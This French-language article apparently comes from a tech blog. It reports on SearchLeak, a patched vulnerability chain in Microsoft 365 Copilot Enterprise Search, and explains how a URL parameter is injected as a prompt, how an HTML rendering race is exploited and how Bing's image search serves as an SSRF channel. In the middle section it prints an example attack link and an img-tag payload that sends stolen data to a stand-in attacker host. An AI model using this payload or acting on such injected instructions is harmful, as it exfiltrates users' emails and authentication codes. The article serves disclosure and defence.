Un simple clic suffit pour voler vos emails, codes 2FA et fichiers sensibles. Microsoft a corrigé, mais la leçon est claire : l’IA en entreprise ouvre une nouvelle ère de risques.
Le 15 juin 2026, les chercheurs de Varonis Threat Labs ont révélé les détails de SearchLeak (CVE-2026-42824), une chaîne de vulnérabilités classée “critique” qui permettait de dérober des données sensibles — emails, codes d’authentification multifacteur, documents internes — en un seul clic, via Microsoft 365 Copilot Enterprise Search.
Microsoft a corrigé la faille début juin, mais l’affaire marque un tournant : pour la première fois, une vulnérabilité exploite la nature même du fonctionnement de l’IA générative en entreprise.
---
Comment fonctionne SearchLeak ?
SearchLeak n’est pas une faille unique, mais une combinaison de trois vulnérabilités qui, prises individuellement, seraient inoffensives. C’est leur chaînage qui crée l’attaque.
| Étape | Technique | Description |
|---|---|---|
| 1 | Parameter-to-Prompt Injection (P2P) | Un paramètre URL q dans Copilot Search est passé directement comme prompt exécutable |
| 2 | Race condition HTML | Le rendu HTML brut a lieu avant que les filtres de sécurité ne s’appliquent |
| 3 | SSRF via Bing | Un contournement CSP via la fonction “Search by Image” de Bing permet l’exfiltration |
---
Étape 1 : L’injection par paramètre
Microsoft 365 Copilot Enterprise Search accepte un paramètre q dans l’URL pour spécifier la requête de recherche. Mais ce paramètre est directement injecté dans le prompt de Copilot, sans être traité comme de la donnée non fiable.
Un attaquant envoie à sa victime un lien de ce type :
https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=[INSTRUCTION MALVEILLANTE]
Le copilot interprète l’instruction comme une requête légitime, et cherche dans la boîte email, le calendrier et les fichiers OneDrive/SharePoint de l’utilisateur.
“La fonctionnalité de recherche est exactement ce dont les attaquants ont besoin, car même avec des capacités limitées, un utilisateur ayant accès à des informations critiques suffit.” — Varonis Threat Labs
---
Étape 2 : Le rendu HTML qui précède la sécurité
Copilot génère sa réponse et la diffuse en streaming vers le navigateur. Pendant ce temps, le navigateur commence à rendre le HTML avant que les filtres de sécurité aient fini leur travail.
C’est ce qu’on appelle une race condition : une fenêtre temporelle pendant laquelle du HTML brut — y compris des balises <img> — est exécuté par le navigateur.
L’attaquant peut ainsi demander à Copilot d’intégrer les données volées dans une balise image :
<img src="https://bing.com/images/search?q=...&imgurl=https://attaquant.com/exfil?data=[MAIL_SUBJECT]">
Étape 3 : Le tremplin Bing
Même avec une balise <img> dans la réponse, Copilot ne charge pas les images depuis n’importe quel domaine. La Content Security Policy (CSP) de Microsoft normalement bloque les requêtes vers des serveurs tiers.
Mais Bing est sur la liste blanche.
L’attaquant utilise la fonction “Search by Image” de Bing, qui effectue une requête côté serveur vers l’URL de l’image spécifiée. Puisque la requête part de l’infrastructure de Bing (pas du navigateur de la victime), le CSP est totalement contourné.
Victime → Copilot → Bing SSRF → Serveur attaquant
└─ Données volées incluses dans l'URL
Le résultat ? Les titres d’emails, codes 2FA, détails de réunions et documents arrivent sur le serveur de l’attaquant via les logs de requêtes.
---
Pourquoi c’est grave
SearchLeak cible Microsoft 365 Copilot Enterprise, c’est-à-dire le déploiement en entreprise. Le rayon d’impact ne se limite pas aux données personnelles :
“Le rayon d’impact pourrait s’étendre encore plus largement, selon la façon dont M365 est connecté à l’environnement.” — Varonis
| Faits clés | Valeur |
|---|---|
| CVE | CVE-2026-42824 |
| Sévérité | Critique (max severity Microsoft) |
| Score CVSS | 6.5 |
| Découvert par | Varonis Threat Labs |
| Corrigé le | Début juin 2026 |
| Type | Chaîne P2P + Race condition + SSRF |
| Action requise | Aucune (patch automatique Microsoft) |
---
Une nouvelle classe de vulnérabilités
Ce qui rend SearchLeak particulièrement inquiétant, c’est qu’il s’appuie sur une technique encore peu connue : le Parameter-to-Prompt Injection (P2P).
Contrairement à l’injection de prompt classique (où le contenu malveillant est dans un email ou un document), le P2P place l’instruction malveillante dans le paramètre URL lui-même. La frontière entre la donnée et la commande disparaît.
“Il n’existe aucun moyen connu de corriger la cause sous-jacente de ce type de faille. Les attaquants trouveront inévitablement de nouvelles façons de contourner les garde-fous.” — Ars Technica
---
Leçons pour les entreprises
1. L’IA en entreprise est une surface d’attaque énorme Copilot Enterprise a accès à l’intégralité du graphe de permissions de l’organisation. Une faille dans cet accès expose tout l’écosystème.
2. La CSP ne suffit pas Le contournement via SSRF montre que les politiques de sécurité classiques ne protègent pas contre des attaques qui exploitent les infrastructures de confiance.
3. Le temps réel est un risque La diffusion en streaming (streaming output) utilisée par les IA génératives crée des fenêtres de race condition que les approches de sécurité “post-traitement” ne couvrent pas.
Recommandations Varonis : - Surveiller les URLs Copilot suspectes (paramètre q contenant des balises HTML) - Revoir les CSP : tout domaine autorisé qui effectue des requêtes serveur sur des URLs fournies par l’utilisateur est un canal d’exfiltration potentiel - La sanitisation doit avoir lieu au rendu, pas en post-traitement
---
Verdict d’Izri
SearchLeak n’est pas une faille comme les autres. C’est la première vulnérabilité majeure qui exploite l’architecture même des IA génératives en entreprise — le streaming, l’injection de contexte, et la confiance dans les paramètres utilisateur.
La bonne nouvelle : Microsoft a corrigé le problème en quelques jours. La moins bonne : le modèle de déploiement de l’IA en entreprise crée des surfaces d’attaque inédites que les outils de sécurité traditionnels ne couvrent pas.
Pour les PME marocaines utilisant ou envisageant Copilot : la puissance de l’IA ne doit pas faire oublier les fondamentaux. Contrôlez qui a accès à quoi, mêmes avec vos outils les plus avancés. Une faille dans l’IA, c’est une faille dans toute l’organisation.
Sources : Varonis, Ars Technica, BleepingComputer, Dark Reading, The Hacker News
